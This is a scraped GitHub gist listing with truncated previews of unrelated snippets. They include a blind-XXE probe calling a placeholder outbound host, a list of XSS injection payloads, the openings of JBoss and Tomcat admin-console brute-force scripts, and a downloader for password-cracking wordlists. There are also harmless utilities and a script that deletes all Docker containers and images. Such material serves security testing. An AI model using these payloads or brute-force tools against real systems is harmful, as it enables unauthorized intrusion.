Live coding demo from talk at Kod.io @ Linz 2014.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Script by OliverK | |
| #Downloads _every_ wordlist in the packet storm security site. | |
| #April 18th, 2011 | |
| # Updated Oct , 2th, 2012 | |
| mkdir common | |
| cd common | |
| wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4 | |
| wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3 | |
| wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| DOMAIN="example.com" | |
| EMAIL="[email protected]" | |
| http -a 'api:key-00000000000000000000000000000000' \ | |
| -f POST "https://api.mailgun.net/v3/$DOMAIN/messages" \ | |
| from="Excited User <postmaster@$DOMAIN>" \ | |
| to="$EMAIL" \ | |
| subject="Hello" \ |
unbaiat
/ Bruteforce JBoss EAP Admin Console(PoC).py
Created
February 8, 2016 08:44
— forked from itsecurityco/Bruteforce JBoss EAP Admin Console(PoC).py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Bruteforce JBoss EAP Admin Console 1.3.4.SP6 (r999) | |
| Author: @itsecurityco | |
| Use: python bruteforce(PoC).py ip:port wordlist | |
| """ | |
| import re | |
| import sys | |
| import urllib | |
| import requests |
itsecurityco
/ tomcat_bruteforce.py
Last active
April 10, 2025 21:21
Tomcat manager console bruteforce
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Tomcat bruteforce | |
| Author: @itsecurityco | |
| """ | |
| import os | |
| import sys | |
| import getopt | |
| import base64 | |
| import requests |
olivierpierre
/ pigzu.sh
Created
July 13, 2016 19:02
Uncompress a directory tree contained in a tarball with pigz
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| if [ "$1" == "" ]; then | |
| echo "Usage: $0 <file to uncompress>" | |
| exit | |
| fi | |
| pigz -dc $1 | tar xf - |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # kill current docker | |
| docker kill $(docker ps -q) | |
| # Delete all containers | |
| docker rm $(docker ps -a -q) | |
| # Delete all images | |
| docker rmi $(docker images -q) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # 2017-10-01T14:14:44+00:00 | |
| 108.175.32.0/20 | |
| 108.175.34.0/24 | |
| 108.175.35.0/24 | |
| 192.173.64.0/18 | |
| 198.38.100.0/24 | |
| 198.38.101.0/24 | |
| 198.38.108.0/24 | |
| 198.38.109.0/24 |
OlderNewer